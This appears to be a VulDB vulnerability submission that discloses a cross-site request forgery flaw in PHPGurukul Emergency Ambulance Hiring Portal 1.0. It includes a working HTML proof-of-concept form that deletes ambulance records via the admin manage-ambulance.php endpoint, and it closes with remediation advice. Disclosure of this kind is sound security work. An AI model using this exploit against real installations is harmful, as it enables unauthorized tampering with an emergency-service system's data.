| Title | PHPGurukul Emergency Ambulance Hiring Portal 1.0 Cross Site Request Forgery |
|---|
| Description | Bug Description:
A Cross Site Request Forgery (CSRF) vulnerability in "/admin/manage-ambulance.php" endpoint of PHPGurukul Emergency Ambulance Hiring Portal 1.0 allows attackers to "Delete an Ambulance" via a crafted html request.
Steps to Reproduce:
# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in Emergency Ambulance Hiring Portal
# Date: 28-03-2024
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE:
To reproduce the attack:
1- Head to the http://localhost/eahp/admin/manage-ambulance.php after logging into the admin account.
2- Here you can see that we are going to delete the ambulance with "XYZ1234" number , for that we will use the HTML code we have written.
<html>
<!-- CSRF PoC --->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/eahp/admin/manage-ambulance.php">
<input type="hidden" name="del" value="10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3- We'll then execute this HTML code and we successfully see that the record has been deleted successfully.
4- This shows that the endpoint "/admin/manage-ambulance.php" is vulnerable to CSRF attack.
5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.
Remediation:
1- Implement anti-CSRF tokens (also known as CSRF tokens or synchronizer tokens) in web forms. These tokens are unique per session and are embedded in the HTML form. The server validates the token with each form submission, ensuring that the request is legitimate.
2- Set the SameSite attribute on cookies to control when they are sent with cross-origin requests. This helps mitigate the risk of CSRF by preventing the automatic inclusion of cookies in cross-site requests. |
|---|
| Source | ⚠️ https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/eahp_csrf.md |
|---|
| User | dhabaleshwar (UID 58737) |
|---|
| Submission | 03/29/2024 12:05 PM (1 Year ago) |
|---|
| Moderation | 03/29/2024 03:27 PM (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 258682 [PHPGurukul Emergency Ambulance Hiring Portal 1.0 Manage Ambulance Page manage-ambulance.php del cross-site request forgery] |
|---|
| Points | 20 |
|---|